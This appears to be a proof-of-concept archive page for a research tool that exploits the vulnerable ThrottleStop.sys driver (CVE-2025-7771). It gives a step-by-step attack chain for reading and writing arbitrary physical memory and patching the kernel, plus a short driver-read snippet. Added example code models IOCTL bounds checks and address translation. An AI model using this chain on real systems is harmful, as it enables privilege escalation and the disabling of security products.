Related vulnerability
Description
Arbitrary physical memory read/write exploitation using ThrottleStop.sys (CVE-2025-7771) with superfetch address translation; Windows kernel security research
Introduction
# Physical Memory Mapper
Research tool demonstrating physical memory access through virtual-to-physical address translation combined with vulnerable driver exploitation.
## Overview
This project explores low-level Windows memory management by combining the superfetch technique for address translation with IOCTL-based physical memory access. Built to understand kernel-mode/user-mode interaction and memory subsystem internals.
## CVE-2025-7771 – ThrottleStop.sys Physical Memory Access R/W
### Vulnerability Summary
**CVE ID:** CVE-2025-7771
**Component:** ThrottleStop.sys (signed driver from TechPowerUp LLC)
**Affected Version:** ThrottleStop 3.0.0.0 and potentially others
**Vulnerability Type:** Exposed IOCTL with Insufficient Access Control (CWE-782)
**CVSS Score:** 8.7 (High) – Kaspersky Labs
**Impact:** Local Privilege Escalation (LPE)
### Technical Details
The ThrottleStop.sys driver exposes two IOCTL handlers that allow completely arbitrary physical memory read and write operations via `MmMapIoSpace`. There are no validation checks, boundary restrictions, or access controls on these interfaces. Any user-mode application can specify any physical address and read or write arbitrary data.
This unrestricted access enables:
- Reading sensitive kernel data structures and cryptographic material
- Writing to arbitrary physical addresses to modify kernel code
- Bypassing Windows kernel protections such as KASLR (once addresses are resolved, e.g. by the superfetch translation below), DSE (no unsigned code is loaded; the signed vulnerable driver does the work) and PatchGuard (writes through physical memory are not blocked up front, although PatchGuard may later detect changes to the regions it monitors and bugcheck the machine)
- Overwriting function pointers to redirect kernel execution
- Disabling security software by patching their kernel components
The arbitrary nature of the access means an attacker has complete control over physical memory without any restrictions imposed by the driver.
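To make concrete what "no validation checks, boundary restrictions, or access controls" means, here is an added example (not ThrottleStop.sys code, and not part of this project) of a user-mode model of an IOCTL request handler in the shape the page describes, beside a deny-by-default version. The request layout, the allowlist and the one-page limit are hypothetical; the real driver's input format is not documented on this page.

```cpp
// Added example, not ThrottleStop.sys code: a user-mode model of the checks that, according
// to the description above, the two IOCTL handlers do not perform. The request layout, the
// allowlist and the one-page limit are hypothetical.
#include <cstdint>
#include <cstddef>
#include <cstdio>
#include <limits>
#include <vector>

namespace ioctl_model {

struct phys_request {        // hypothetical input buffer of a physical read/write IOCTL
    std::uint64_t phys;      // physical address the caller wants mapped
    std::uint32_t length;    // bytes to read or write
};

struct phys_window {         // a physical range the driver has a legitimate reason to touch
    std::uint64_t base;
    std::uint64_t length;
};

// The shape the page describes: address and length go to MmMapIoSpace as-is.
inline bool accept_unchecked(phys_request const&) { return true; }

// Deny-by-default shape: caller authorisation, sane length, overflow-safe bounds,
// and containment in one pre-approved window.
inline bool accept_checked(phys_request const& r,
                           std::vector<phys_window> const& allowed,
                           bool caller_is_admin) {
    if (!caller_is_admin) return false;                     // the device DACL should already enforce this
    if (r.length == 0 || r.length > 0x1000) return false;   // never map more than one page per request
    if (r.length > std::numeric_limits<std::uint64_t>::max() - r.phys)
        return false;                                       // phys + length would wrap around
    std::uint64_t const end = r.phys + r.length;            // exclusive end
    for (auto const& w : allowed) {
        // r.phys >= w.base guarantees that end - w.base cannot underflow
        if (r.phys >= w.base && end - w.base <= w.length) return true;
    }
    return false;                                           // kernel RAM, other devices, everything else
}

// Constructed allowlist: one small MMIO window, chosen arbitrarily for the example.
inline std::vector<phys_window> sample_allowlist() {
    return {{0xFED00000, 0x400}};
}

}  // namespace ioctl_model

int main() {
    using namespace ioctl_model;
    auto const allow = sample_allowlist();
    phys_request const kernel_page{0x1A2B3000, 8};   // a frame that belongs to the kernel
    phys_request const wrap{0xFFFFFFFFFFFFFFF8ull, 0x10};
    std::printf("unchecked handler maps kernel page: %s\n", accept_unchecked(kernel_page) ? "yes" : "no");
    std::printf("checked handler maps kernel page:   %s\n", accept_checked(kernel_page, allow, true) ? "yes" : "no");
    std::printf("checked handler accepts wrapping request: %s\n", accept_checked(wrap, allow, true) ? "yes" : "no");
    return 0;
}
```

The overflow test matters: a handler that computes `phys + length` and only compares the result against an upper bound can be steered back below the bound with a huge address. In a real driver the authorisation half is done at device level (a restrictive DACL on the device object, e.g. via `IoCreateDeviceSecure` with `FILE_DEVICE_SECURE_OPEN`), not by a flag in the request as in this model.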
### Attack Vector
The exploitation follows this pattern:
1. **Driver Access** → Open handle to `\\.\ThrottleStop` device object
2. **Address Discovery** → Use `NtQuerySystemInformation` to locate kernel base address
3. **Translation** → Apply superfetch technique to convert virtual addresses to physical
4. **Memory Operations** → Issue the read/write IOCTLs; the driver maps the requested physical page with `MmMapIoSpace` and performs the access on the caller's behalf
5. **Kernel Manipulation** → Overwrite kernel functions or security structures
Real-world malware has leveraged this vulnerability to disable security products by patching kernel functions like `NtAddAtom` to hijack execution flow.
## Implementation
This project demonstrates the technical components of such an attack chain for educational purposes:
**Superfetch Integration** – Translates kernel virtual addresses to physical addresses using `SystemSuperfetchInformation`
**Driver Interface** – Communicates with vulnerable driver through `DeviceIoControl` for physical memory operations
```cpp
#include <cstdint>
#include "Superfetch/Superfetch.h"  // spf::memory_map (jonomango/superfetch)
#include "Driver/Driver.h"          // Driver.ReadPhysical<T>() wrapping the ThrottleStop.sys IOCTLs
// Acquire memory map for translation (PFN database snapshot; the query needs an elevated caller)
auto mm = spf::memory_map::current();
if (!mm) return;  // snapshot failed
// Translate virtual kernel address to physical (example address; the page must be resident)
void* virt = reinterpret_cast<void*>(0xFFFFF80000001000);
std::uint64_t phys = mm->translate(virt);
if (!phys) return;  // not found in the PFN database: paged out or not a kernel mapping
// Access physical memory through driver
ULONG64 value = Driver.ReadPhysical<ULONG64>(phys);
(void)value;
```
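The translation step (step 3 of the attack vector and the Superfetch Integration point above) is easy to get wrong, so here is an added, stand-alone model of it. This is example code, not this project's code and not the superfetch library's; the PFN entries are constructed sample data in the shape the PFN query reports for kernel-owned pages (page frame number and owning kernel virtual address), and the real `SystemSuperfetchInformation` query, which needs an elevated caller, is not performed. It goes one step beyond the snippet above by also handling a buffer that crosses a page boundary.

```cpp
// Added example, not code from this project or from the superfetch library: a stand-alone
// model of the superfetch translation step. The PFN entries below are constructed sample
// data (pfn -> owning kernel VA); no real SuperfetchPfnQuery is performed.
#include <cstdint>
#include <cstddef>
#include <cstdio>
#include <optional>
#include <unordered_map>
#include <vector>

namespace spf_model {

constexpr std::uint64_t kPageShift = 12;
constexpr std::uint64_t kPageSize  = std::uint64_t{1} << kPageShift;
constexpr std::uint64_t kPageMask  = kPageSize - 1;

// One PFN database entry, reduced to what translation needs.
struct pfn_entry {
    std::uint64_t pfn;              // page frame number (physical address >> 12)
    std::uint64_t virtual_address;  // owning kernel VA, 0 if the frame is free or not kernel-mapped
};

class memory_map {
public:
    // Invert the PFN database: kernel virtual page -> PFN. Frames without a kernel VA are skipped.
    explicit memory_map(std::vector<pfn_entry> const& entries) {
        for (auto const& e : entries)
            if (e.virtual_address != 0)
                va_to_pfn_[e.virtual_address & ~kPageMask] = e.pfn;
    }

    // Kernel VA -> physical address. nullopt when the page is not in the snapshot
    // (paged-out pool, a user-mode address, or a page that moved since the snapshot).
    std::optional<std::uint64_t> translate(std::uint64_t virt) const {
        auto it = va_to_pfn_.find(virt & ~kPageMask);
        if (it == va_to_pfn_.end()) return std::nullopt;
        return (it->second << kPageShift) | (virt & kPageMask);
    }

    // Same for a buffer of `len` bytes: a physical R/W primitive sees frames, not pages, so
    // every page the buffer touches must map to the next PFN, otherwise the access has to be
    // split per page. Returns the physical address of the first byte, or nullopt.
    std::optional<std::uint64_t> translate_range(std::uint64_t virt, std::size_t len) const {
        if (len == 0) return std::nullopt;
        auto first = translate(virt);
        if (!first) return std::nullopt;
        std::uint64_t expect_pfn = *first >> kPageShift;
        std::uint64_t const last_page = (virt + len - 1) & ~kPageMask;
        for (std::uint64_t page = (virt & ~kPageMask) + kPageSize; page <= last_page; page += kPageSize) {
            auto it = va_to_pfn_.find(page);
            if (it == va_to_pfn_.end() || it->second != ++expect_pfn) return std::nullopt;
        }
        return first;
    }

private:
    std::unordered_map<std::uint64_t, std::uint64_t> va_to_pfn_;
};

// Constructed sample PFN database (not taken from a real machine).
inline memory_map sample_map() {
    return memory_map({
        {0x1A2B3, 0xFFFFF80000001000},  // two kernel pages that are contiguous both virtually...
        {0x1A2B4, 0xFFFFF80000002000},  // ...and physically
        {0x0FF00, 0xFFFFF80000003000},  // the next virtual page lives in an unrelated frame
        {0x00042, 0},                   // free frame, no owner
    });
}

}  // namespace spf_model

int main() {
    auto const mm = spf_model::sample_map();
    auto const phys = mm.translate(0xFFFFF80000001234);
    std::printf("0xFFFFF80000001234 -> %#llx\n", phys ? (unsigned long long)*phys : 0ull);
    auto const span = mm.translate_range(0xFFFFF80000002FF0, 0x20);
    std::printf("32-byte buffer at 0xFFFFF80000002FF0 is %s\n",
                span ? "physically contiguous" : "split across non-adjacent frames");
    return 0;
}
```

The second case is the one that bites in practice: a kernel structure that is virtually contiguous can straddle two frames that are nowhere near each other physically, so a single physical read of its size returns a mix of the first page and whatever happens to follow that frame. The snapshot also goes stale as soon as the memory manager moves or frees pages, which is why a translation should be done right before the access and re-done if the read looks wrong.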
## References
- CVE-2025-7771 Details
- Kaspersky Security Research on Active Exploitation
- [superfetch library](https://github.com/jonomango/superfetch)
## Disclaimer
**Educational and research purposes only.** Unauthorized access to computer systems is illegal. This code demonstrates documented vulnerabilities for defensive security research.
## License
MIT License
File snapshot
[4.0K] /data/pocs/8f3a164d2f973b55eb75c9eccc64375e3e40ca4e
├── [4.0K] Driver
│ └── [7.4K] Driver.h
├── [1.8K] Entry.cpp
├── [3.4K] README.md
├── [4.0K] Superfetch
│ ├── [3.9K] nt.h
│ └── [6.9K] Superfetch.h
├── [ 160] ThrottleStop.slnx
├── [ 49K] ThrottleStop.sys
├── [6.6K] ThrottleStop.vcxproj
└── [1.2K] ThrottleStop.vcxproj.filters
3 directories, 9 files
Notes
1. Accessing the original source is recommended.
2. If the source is unavailable or no longer reachable, e-mail f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.